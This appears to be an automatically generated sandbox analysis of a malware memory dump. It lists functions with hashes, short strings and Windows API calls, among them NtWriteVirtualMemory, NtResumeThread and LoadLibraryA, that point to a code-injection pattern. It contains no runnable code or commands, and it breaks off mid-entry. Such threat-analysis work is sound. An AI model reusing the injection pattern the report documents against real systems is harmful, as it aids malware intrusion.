
Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 9193d6a83491062084f7c931331e442a75a9f324e8af13e4c7150b6e58d60875
Instruction ID: f192837af20e66a66022e1b8e750902d8b104412042609360a51dda7c7f7452f
Opcode Fuzzy Hash: 9193d6a83491062084f7c931331e442a75a9f324e8af13e4c7150b6e58d60875
Instruction Fuzzy Hash: A20263726043499FEB768E24CD807EE7BB2FF56390F55812DDC899B250D3718A81DB82

Uniqueness

Uniqueness Score: -1.00%

Function 020B4B25, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 462COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 4932d99f107957558c9687702f938aceb4bb939905227d65fd7e23b9ec9ab583
Instruction ID: d617ef8a9fadb6befe639a3cfd7cd4cae5030836d4a9a874054ede890a9b2a1d
Opcode Fuzzy Hash: 4932d99f107957558c9687702f938aceb4bb939905227d65fd7e23b9ec9ab583
Instruction Fuzzy Hash: E60285726043499FEB768E24CD807EE7BB2FF56390F51812DDC899B250D3718A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 020B4B2D, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 455nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 0f8910b20763209f6706697d95cd865fb1fc7c34acb8035ab60847eb94285ef6
Instruction ID: f5279fdfa64fcbd15b1db6a63ee1fa91d6b4b8a716ad04de9c265a48e76a1385
Opcode Fuzzy Hash: 0f8910b20763209f6706697d95cd865fb1fc7c34acb8035ab60847eb94285ef6
Instruction Fuzzy Hash: A70263726043499FEB768E24CD807EE7BB2FF56390F55812DDC899B250D3718A81DB82

Uniqueness

Uniqueness Score: -1.00%

Function 020B4B5C, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 450nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 2298442bd37819b1b6b7c357d8c9de4970b77182adb7fbb516ae9b6549131f88
Instruction ID: c38496be04597fcb1dd45e281cba591141f1f64c7eb637b0c0827f1968c8f721
Opcode Fuzzy Hash: 2298442bd37819b1b6b7c357d8c9de4970b77182adb7fbb516ae9b6549131f88
Instruction Fuzzy Hash: 28F163726043499FEB768E24CD807EE3BB2FF56390F55812DDC899B250D3718A81DB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4BB0, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 436nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: f5c5e5fd636cd121def5c80cc82e14bb79d716b0916f6904991a5cb3a27f25a8
Instruction ID: f5c61bb63b518895026f14b96fafd868e277592a029897c82f0627cbd5399838
Opcode Fuzzy Hash: f5c5e5fd636cd121def5c80cc82e14bb79d716b0916f6904991a5cb3a27f25a8
Instruction Fuzzy Hash: 26F153726043499FEB768E24CD807EE7BB2FF56350F55812DEC89AB250D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4C16, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 2b7e81fd550af03f01b692945cea1f3f62465c6292826c27b9a379517a8fac83
Instruction ID: a922ca6bccf750626ce685c30a05460df3549a7fedc7adf70e57ca1847e3e287
Opcode Fuzzy Hash: 2b7e81fd550af03f01b692945cea1f3f62465c6292826c27b9a379517a8fac83
Instruction Fuzzy Hash: 9EF143726043499FEB768E24CD807EE3BB2FF56350F514129ED899B250D3758E81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4C68, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 398nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 0cacaef1874a75850a63464666257456229e31ebe98e430e5958b80d730c3696
Instruction ID: c5b7db3143e5f9abaa37487cf653357f088ae8a4b8d5462cf2267fe964aee377
Opcode Fuzzy Hash: 0cacaef1874a75850a63464666257456229e31ebe98e430e5958b80d730c3696
Instruction Fuzzy Hash: C4E15372A043499FEB368E24CD807EE7BB2FF56350F51812DDD89AB250D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4CE4, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 374nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 6451c019389f5a3c1f0c4034d3d08bb7079b7a2ea939c82469d9cf4ce283cf7d
Instruction ID: acb1a4188b2e5f06c5f2853c1f01d2ad4777e37fdb14e365a8d306445a50a096
Opcode Fuzzy Hash: 6451c019389f5a3c1f0c4034d3d08bb7079b7a2ea939c82469d9cf4ce283cf7d
Instruction Fuzzy Hash: 33E16432A043499FEB768E24CD807EE7BB2FF56390F51416DDD89AB250D3758A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4D2A, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

Xkiu, xrefs: 020B4D7C
dGi, xrefs: 020B4EF2
UY, xrefs: 020B4D4C

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: 51b2b237838d3415174843bbb4610e4fefa44f2f3bd515caa0b36c8ba75e4877
Instruction ID: ad6e711dd971b91ac85e6f882da52b425e4d2e87c4e08ca7081a3e6cb5ba68e6
Opcode Fuzzy Hash: 51b2b237838d3415174843bbb4610e4fefa44f2f3bd515caa0b36c8ba75e4877
Instruction Fuzzy Hash: A2D175326083499FEB768E24CD807EE3BB2FF56390F51416DDD89AB250D3758A85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B623F, Relevance: 4.2, Strings: 3, Instructions: 485COMMON

Download Yara Rule

Strings

LO, xrefs: 020B0BBB
Du#, xrefs: 020B6625
b, xrefs: 020B64CA

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: Du#$ LO$b
API String ID: 2167126740-2332499369
Opcode ID: f72ec2ff1499defadee0ea315d3e90b0bc4985808a81700023e45d24f88d9377
Instruction ID: 38226b120138c09ec24fc1d644dad21b5cc5fccbcb29e979f583a7579d67d255
Opcode Fuzzy Hash: f72ec2ff1499defadee0ea315d3e90b0bc4985808a81700023e45d24f88d9377
Instruction Fuzzy Hash: 70023172A4834ACFDB769E34CD647EF77A6AF52390F45412EDC86A7610E3318981DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B4D83, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 342nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

dGi, xrefs: 020B4EF2

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: dGi
API String ID: 3527976591-4201200356
Opcode ID: 6215ef02f1167676c885e6d8ab275c5f1b8ee71ba0f45ad77cf20b61d90237b0
Instruction ID: 5e47f3e6185953e694088ff12961b9173f51a567085ac85fb67ff9bfea9015d6
Opcode Fuzzy Hash: 6215ef02f1167676c885e6d8ab275c5f1b8ee71ba0f45ad77cf20b61d90237b0
Instruction Fuzzy Hash: 41D154326043499FEB768E24CD807EE7BB2FF56340F51816DDD89AB260C3758981DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4DE9, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 323nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

dGi, xrefs: 020B4EF2

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: dGi
API String ID: 3527976591-4201200356
Opcode ID: 7a56f2426c25f4ea4170fa9b1048d596258971f2f23ab377a1ccac0ae6419273
Instruction ID: 748be1f519026f4a59eb0d30c149565857319d1cfe7e6de9b225696e3c27e96d
Opcode Fuzzy Hash: 7a56f2426c25f4ea4170fa9b1048d596258971f2f23ab377a1ccac0ae6419273
Instruction Fuzzy Hash: C7C153326043099FEB768E24CD807EE7BB2FF56350F51816DDD89AB260C3758985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4E36, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 310nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

dGi, xrefs: 020B4EF2

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: dGi
API String ID: 3527976591-4201200356
Opcode ID: 0862be77a20c944499bab0012035be49f483f568b5b478d3ac47e113bd94c852
Instruction ID: 5fb498e7206c0c485ee0a5ae92f68f5a221bc3c519fbf45c3984779cc26de62d
Opcode Fuzzy Hash: 0862be77a20c944499bab0012035be49f483f568b5b478d3ac47e113bd94c852
Instruction Fuzzy Hash: 5FC131326043499FEB768E24CD807EE3BB2FF56350F51416DED899B260C3758985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4E99, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 290nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

dGi, xrefs: 020B4EF2

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: dGi
API String ID: 3527976591-4201200356
Opcode ID: ec7b891e3b2418356ceb8625e3d8751edfc76ce5d09294ec880fb191ccafcdae
Instruction ID: 58b3946ca79af5cf972cf0abe6a7e10404ee5cc30e50b02bb6ed28dd1ffdb333
Opcode Fuzzy Hash: ec7b891e3b2418356ceb8625e3d8751edfc76ce5d09294ec880fb191ccafcdae
Instruction Fuzzy Hash: 60B141326043099FEB768F24CD807EA7BB2FF56390F91816DDD899B260C3758985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0816, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000), ref: 020B086E

Strings

LO, xrefs: 020B0BBB

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: LO
API String ID: 1129996299-2847742878
Opcode ID: ec7451cef3631c401c0dfca8d2daf012ca25de12d6b2e7bd529603ca6f62c224
Instruction ID: efcbb6787c743b9ba8d1ce420e623666deae71184454fcbe4f5ebe38defd4731
Opcode Fuzzy Hash: ec7451cef3631c401c0dfca8d2daf012ca25de12d6b2e7bd529603ca6f62c224
Instruction Fuzzy Hash: CB812472A08389CFEB359F38C9947EEB7A3AF59350F41412EDC8697650D7309A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B98CB, Relevance: 3.2, APIs: 2, Instructions: 250librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 96521ee2d5980005c89241692402832b8cde0f9a5c4696f84a09a785b56a9516
Instruction ID: 14b69cf53babff1dfcb684894ac7a5b77beff35522cfdd77c17f22da0b559be3
Opcode Fuzzy Hash: 96521ee2d5980005c89241692402832b8cde0f9a5c4696f84a09a785b56a9516
Instruction Fuzzy Hash: D1714731604309CFEB779E78C9A03FE32A2AF963A0F54812ADD42CB655D339C481EE41

Uniqueness

Uniqueness Score: -1.00%

Function 020B0C25, Relevance: 2.0, APIs: 1, Instructions: 518COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 57eaaf57417f1c7d3c1a08590ebf539911aea5e229e56b01d1536989ef3c81f2
Instruction ID: 3ee9bff7b855c7465b7c0a0919f43526d7b2a211945805980a6e0a00148eddbd
Opcode Fuzzy Hash: 57eaaf57417f1c7d3c1a08590ebf539911aea5e229e56b01d1536989ef3c81f2
Instruction Fuzzy Hash: 9802797160438A9FDF369E28CC987EE77A3AF89350F55412ECC89DB644D3348A85DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0C5B, Relevance: 2.0, APIs: 1, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 21f61b7b57c3b7ecf35bcc14ef6c96283f7194b2614c2f1a2ce935c23263deb0
Instruction ID: 0cc1ee987866bb910aee8b105e09067e1ebd619ae4c3089de9bb2dd6fad5dbb6
Opcode Fuzzy Hash: 21f61b7b57c3b7ecf35bcc14ef6c96283f7194b2614c2f1a2ce935c23263deb0
Instruction Fuzzy Hash: 9702777160438A9FDF369E28CC987EE77A3AF89350F54412EDC89DB244D3348985DB52

Uniqueness

Uniqueness Score: -1.00%

Function 020B0CA6, Relevance: 2.0, APIs: 1, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c4e67aa76bb244692d6c5ecc64ae14ffb2cad7dc8d7184ac96e33837b3e123
Instruction ID: 16e2c87514105101fec0763894b3795587593c46b9d5cc9398eca7ac075e68da
Opcode Fuzzy Hash: 48c4e67aa76bb244692d6c5ecc64ae14ffb2cad7dc8d7184ac96e33837b3e123
Instruction Fuzzy Hash: 61028971A0438A9BDF369E28CC987EE77E3AF89350F54412EDC89DB244D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0CC1, Relevance: 2.0, APIs: 1, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b00900a32eb0f84b8205d77dcf7e42613c0fe364d887c36e7c02be4e9d19bf47
Instruction ID: 2759e6293b11069754aec7b092902175671ba461dae43219b0904b900e3b7b0e
Opcode Fuzzy Hash: b00900a32eb0f84b8205d77dcf7e42613c0fe364d887c36e7c02be4e9d19bf47
Instruction Fuzzy Hash: B7027771A0438A9FDF369E28CC987EE77A3AF89350F54412EDC89DB244D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0CF3, Relevance: 2.0, APIs: 1, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: bdba43017120969221959d27dd542efbb2d6b443ee70450cd6c29660b4fce512
Instruction ID: f7873c7a17081bc0a9dc6e1849d6a887d686daa2251e2dad9615f67fe5267213
Opcode Fuzzy Hash: bdba43017120969221959d27dd542efbb2d6b443ee70450cd6c29660b4fce512
Instruction Fuzzy Hash: 48028971A0438A9BDF369E28CC987EE77E7AF89350F54412ECC89DB244D3358981DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0D91, Relevance: 2.0, APIs: 1, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: acdf5b7fb1e4b78c0349ab9556de92ebc52438df88aa39b88be84c1f8e4015d9
Instruction ID: fac22ce119ddb840b8df42291103eabbdf876bb2172ee67c135da7f28e2c6a36
Opcode Fuzzy Hash: acdf5b7fb1e4b78c0349ab9556de92ebc52438df88aa39b88be84c1f8e4015d9
Instruction Fuzzy Hash: 87F1787160438A9FDF369E28CC987EE77A7AF89350F94402ECC89DB245D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0DEF, Relevance: 1.9, APIs: 1, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6d6ea93b824bb8f7695fe0b24f00f03ad777bb5e364c8cac0f924d4f5bae3780
Instruction ID: 48d9df8b199839d69cf62b61b9730fb7b33dc47fe56d58d1136bb75982c1eac2
Opcode Fuzzy Hash: 6d6ea93b824bb8f7695fe0b24f00f03ad777bb5e364c8cac0f924d4f5bae3780
Instruction Fuzzy Hash: 13E1997160438A9BDF369E28CC987EE77E7AF89350F94412ECC89D7244D3358981DB52

Uniqueness

Uniqueness Score: -1.00%

Function 020B0E4D, Relevance: 1.9, APIs: 1, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05a2da875e90e1101dc8124568d5f2b4484d2eb18fa7525a768268e58c618296
Instruction ID: b1841690ab2aea83150248b288d6bc2596e3deb19a34642a17b784ea7eb3d726
Opcode Fuzzy Hash: 05a2da875e90e1101dc8124568d5f2b4484d2eb18fa7525a768268e58c618296
Instruction Fuzzy Hash: C6E188716043869FDF369E28C8987EE77E3AF89350F94412EDC89D7244D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0E80, Relevance: 1.9, APIs: 1, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5c2845b78185355a84ddb499d900c64bb16e9bdb37fdc4ef1f7e2924eab6945c
Instruction ID: 45d605c930455396b9bb1064d21f5426069948a6e45292c431492e64b5161005
Opcode Fuzzy Hash: 5c2845b78185355a84ddb499d900c64bb16e9bdb37fdc4ef1f7e2924eab6945c
Instruction Fuzzy Hash: B0E1A8716043899FDF369E28C8987EEB7E3AF89350F94402EDC89D7244D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0EB3, Relevance: 1.9, APIs: 1, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 38083e5510cf2fa60d35309fa64371452ea8e068e3c11788bd1ab6c89692d3ba
Instruction ID: 832e024fb6ce217460597adbc2d646dcf3152cba898dfb3c42f6d4f261a85699
Opcode Fuzzy Hash: 38083e5510cf2fa60d35309fa64371452ea8e068e3c11788bd1ab6c89692d3ba
Instruction Fuzzy Hash: 2CD197B16043899FDF369E28C8987EEB7E3AF89350F94412EDC89D7244D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0F2F, Relevance: 1.9, APIs: 1, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f4ea1a0f47a1b9d6a6b6a0cb5aff82c2fb15b735a2e4185aff0dd0c865a8cf85
Instruction ID: f69c8421ce332291437504e9d2ea1be32f983f5f8333bc6760379ff0f7197e4a
Opcode Fuzzy Hash: f4ea1a0f47a1b9d6a6b6a0cb5aff82c2fb15b735a2e4185aff0dd0c865a8cf85
Instruction Fuzzy Hash: 81D179716043899BDF369E28CC987EE77E7AF89350F94412EDC89D7244D3348985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0F9B, Relevance: 1.8, APIs: 1, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2aa3e510cc23afb73d20cf28e84a74d2b6bee1428639343f9039a9f9f36b157e
Instruction ID: 48d7d8cbe6faadfe0acba63aad8e556afb5e16eb608ec0bbd2e387229fa0b091
Opcode Fuzzy Hash: 2aa3e510cc23afb73d20cf28e84a74d2b6bee1428639343f9039a9f9f36b157e
Instruction Fuzzy Hash: 7FC17A716043899BDF369E28CCA87EE77E7AF89350F94412EDC89D7284D3348985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B0FEB, Relevance: 1.8, APIs: 1, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 60e99362cd5054885a5793e166d7c7e8ae3daed5778cea9dc968a07745b941d1
Instruction ID: 029bd0de8e994bb11b393226f4bc6629920ccc0d3b9506160d62daa692335633
Opcode Fuzzy Hash: 60e99362cd5054885a5793e166d7c7e8ae3daed5778cea9dc968a07745b941d1
Instruction Fuzzy Hash: 02C1AC716043859FDF369E28CC987EEB7E2AF49350F94412EDC89D7245D3348985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B104C, Relevance: 1.8, APIs: 1, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c8fb6eb0d6ff39e2d756a00618b92f603502b9145685c6ea2fa34881d92f4e
Instruction ID: 94fb12a7f554820241cb664039f323a0cbe9512bf8cc7b63bf114f913a5261b2
Opcode Fuzzy Hash: 15c8fb6eb0d6ff39e2d756a00618b92f603502b9145685c6ea2fa34881d92f4e
Instruction Fuzzy Hash: FCB19B716043869BDF369E288CA87EEB7E6AF4A350F94412ECC8DD7285D3344985DB43

Uniqueness

Uniqueness Score: -1.00%

Function 020B1094, Relevance: 1.8, APIs: 1, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f78e09d2e114769bedf648e6860f010d80955a67ce202e7c3ddc9d8a99def8
Instruction ID: 6b00f8bd9f26b1eb9589fa45801f0ac0374555522320d73aad955a6054181f6e
Opcode Fuzzy Hash: 28f78e09d2e114769bedf648e6860f010d80955a67ce202e7c3ddc9d8a99def8
Instruction Fuzzy Hash: 88A19E706043859BDF339E28CCA87EEB7E6AF46350F94412ECC89D7685D3358985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B10CB, Relevance: 1.8, APIs: 1, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7956d023dfe424123a5e8bc2a01a88740ed0a7cb9e53c522c2ca50a8686d407a
Instruction ID: 9a5b1ee1ab6e9f65c00a8037ac98dfbf76721a0d2694a24d12d1059bfcd20928
Opcode Fuzzy Hash: 7956d023dfe424123a5e8bc2a01a88740ed0a7cb9e53c522c2ca50a8686d407a
Instruction Fuzzy Hash: 41A19D706043869BDF339E28C8A87EEB7E6AF46350F94412ECC89D7685C3348985DB53

Uniqueness

Uniqueness Score: -1.00%

Function 020B1120, Relevance: 1.8, APIs: 1, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d40f183cbe6d4692138b10daa508c322502ab897881819df514bec2322fcef
Instruction ID: 703fd3088e849f19a736688c4e4508b4ca1ed9efd40a8ef56d7ffab165a19fc8
Opcode Fuzzy Hash: 64d40f183cbe6d4692138b10daa508c322502ab897881819df514bec2322fcef
Instruction Fuzzy Hash: 71919F706043869BDF339E28CCA87EEB7E6AF46350F94812ECC8997685C3354985DB53

Uniqueness

Uniqueness Score: -1.00%

Function 020B4F14, Relevance: 1.8, APIs: 1, Instructions: 262nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 0d4ee854a86bbc01fb18b53fe8b678bdeb588d20a949aab7bd4d181cbda27a59
Instruction ID: 5833439bc8048efcb62ea388265e8b1f9b67597399079b58d31bc99b8bd6f5d1
Opcode Fuzzy Hash: 0d4ee854a86bbc01fb18b53fe8b678bdeb588d20a949aab7bd4d181cbda27a59
Instruction Fuzzy Hash: C1A151316043089FEB368F24CD807EA7BB2FF56350FA1816DDD899B260C3754A85DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B116C, Relevance: 1.8, APIs: 1, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
